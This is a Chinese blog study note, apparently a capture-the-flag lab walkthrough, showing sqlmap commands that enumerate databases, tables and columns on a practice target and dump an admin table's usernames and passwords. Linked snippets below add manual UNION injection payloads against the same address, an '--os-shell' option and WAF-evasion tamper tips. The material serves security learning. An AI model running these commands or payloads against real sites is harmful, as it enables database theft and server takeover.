SQLMap学习笔记(一)

最新推荐文章于 2024-05-04 20:29:53 发布
最新推荐文章于 2024-05-04 20:29:53 发布
阅读量394 收藏 1
点赞数 1
分类专栏: SQLMap 文章标签: SQLMap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lorezon/article/details/103129523
版权

一:SQLMap简介
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MYSQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB。
SQLmap采用了布尔盲注、时间盲注、报错注入、联合查询注入、堆查询注入5种独特的SQL注入技术。
二:使用——靶场:http://59.63.200.79:8003/?id=1
(1)sqlmap.py -u http://59.63.200.79:8003/?id=1,查看信息
在这里插入图片描述
这里显示出了数据库类型、web serveroperating system、web application techology的一些信息。
(2)sqlmap.py -u “http://59.63.200.79:8003/?id=1” --dbs,查看数据库。
在这里插入图片描述
这里就显示出了当前用户下的所有数据库名。一共3个,分别是information_schema、maoshe、test。结合一下靶场里的猫舍,猜测flag在名为maoshe的库里面。
(3)所以这一步就要 sqlmap.py -u “http://59.63.200.79:8003/?id=1” -D maoshe --tables 查询maoshe库里的表名。
在这里插入图片描述
可以看到,maoshe库里面的表是admin、dirs、news、xss四个。
(5)有了表名,接下来我们就可以获取表中的字段名了:
sqlmap.py -u “http://59.63.200.79:8003/?id=1” -D maoshe -T admin --columns
在这里插入图片描述
可以看到,表里面有三个字段名,分别是Id、password、username,需要注意的当然就是username和password两个。
(6)字段名已经知道,那么就来获取字段的内容:
sqlmap.py -u “http://59.63.200.79:8003/?id=1” -D maoshe -T admin -C username,password --dump
在这里插入图片描述
可以看到,password已经出来了,回去提交就会First Blood了!

Sure_lis
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap自动化注入猫舍靶场练习
weixin_45540609的博客
04-15 919
使用 python sqlmap.py -u 加上url 扫描存在漏洞,一路enter,paramenter显示有bool盲注 --dbs查看有哪些数据库,然后-D进入maoshe数据库 --tables查看有哪些数据表,-T进入数据表admin --columns查看有哪些字段 算了,直接在admin后面加 --dump脱库吧!铛铛,成功! ...
sqlmap使用教程大全命令大全(图文)
m0_59092234的博客
07-31 448
总之,在不确定哪个Payload或参数为注入点时,为了保证全面性,建议使用高的level值,即5。虽然SQLMap自带的tamper可以做很多事情,但在实际环境中,往往比较复杂,可能会遇到很多情况,tamper不可能很全面地应对各种环境,所以建议读者在学习如何使用自带的tamper的同时,最好能够掌握tamper的编写规则,这样在应对各种实战环境时才能更自如。确定网站存在注入后,用于查询当前用户下的所有数据库,如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有数据库,如图。...
sql注入实战(一)
whiteso的博客
01-19 746
实例靶场 http://59.63.200.79:8003/ http://59.63.200.79:8003/?id=1 and 1=1 order by 3 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database() http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_sc
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLMap使用教程:萌新自用总结
tj2718647721的博客
07-10 127
可以通过 “--risk” “--level”调整 扫描级别,服务器存在WAF或者其他拦截器时,可以使用"-tamper"来变形Payload。使用 python sqlmap.py -r 1.txt --os -shell --level=3可以获取shell。--batch --smart -a自动注入 ,--batch --smart 自动选择 y/s/q。使用--dbs获得数据库列表,使用“-d 数据库名 --table”指定获得所有表名。使用“--dump”可以索取全部数据。
sqlmap学习笔记
Zasen_的博客
06-05 527
ps:学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的...
SQLmap学习笔记
weixin_43988774的博客
03-23 4285
sqlmap所有参数的学习笔记
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
最新发布
2301_82242964的博客
05-04 620
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
sqlmap学习笔记:常用命令
ElsonHY的博客
12-08 1058
文章目录前言0x01 使用环境0x02 判断注入点0x03 常用命令1.查询当前数据库2.查询所有数据库3.爆表名4.爆字段名5.脱库6.获取数据库用户密码(加爆破)0x04 总结 前言 sqlmap可以说是sql自动化注入工具的不二之选了,通常sql注入的过程中,也没有人绝对地只用手注或者自动化注入,通常是根据实际情况两者配合使用,这篇文章以POST类型注入为例子,示范sqlmap常用命令的使用方法。 0x01 使用环境 测试网页:sqli-labs的第11关。 操作系统:kali(由于win环境
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
Sqlmap基础(二)
dieman0446的博客
03-31 128
sqlmap.py -r req1.txt --dbms Oracle --risk 3 转载于:https://www.cnblogs.com/tdcqma/p/5341798.html
[4] SQL 注入(七月最佳)
Debroon
12-02 1918
SQL 注入十分普遍,新闻➡️《报告称 超 6 成 Web应用程序攻击来自SQL注入》。 如上所述,SQL注入攻击 或 SQLi 是一种通过将恶意SQL语句插入其输入字段以供执行来利用SQL语句的基础漏洞的方法。 起于 1998 年一名叫 Rfp 的黑客发表的一篇文章。 从那时起,TA主要针对零售商和...
SQL注入靶场:辛巴猫舍
Zeker62的博客
07-28 5051
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容 说明id=3 的时候,数据表内容已经"见底"了 于是我们就知道了这个数据表有四行,包括id=0的初始页面 查:有多少列 使用order by 语句. 我从 1~3查,发现3没有,2有. 那么就证明这个数据表就两个字段 读者可以
手工注入(猫舍为例)
Greedy Hat的博客
07-31 2184
显错注入实例
sqlmap的使用详解(一:概念性较强,涉及众多参数解释,主要是介绍)
→_→
10-08 1410
目录 sqlmap简介 sqlmap支持五种不同的注入模式: sqlmap支持的数据库有: 检测注入 基本格式 跟随302跳转 cookie注入 从post数据包中注入 注入成功后 获取数据库基本信息 从数据库中搜索字段 读取与写入文件 sqlmap详细命令: Options(选项): Target(目标): Request(请求): Enumeration(枚举): Optimization(优化): Injection(注入): Detection(检测): T
SqlMap用户手册
ludx212的专栏
06-10 1291
SqlMap用户手册 转自 投稿者:梧桐雨 发表于:2013-07-28   点击:13,549 引:本文已经出了续篇,文章内容有点长,但都是精华,读者们耐心的看吧,续篇的链接在文末。 1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,
sqlmap的基本命令使用
热门推荐
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
iBATIS学习笔记:从基础到高级操作
"这是一份基于iBATIS 2.3.4的学习笔记,涵盖了iBATIS的基本概念、环境搭建、配置文件、CRUD操作、批处理、优点与缺点,以及高级特性如动态SQL和事务管理等内容。" iBATIS是一个优秀的Java持久层框架,它允许开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值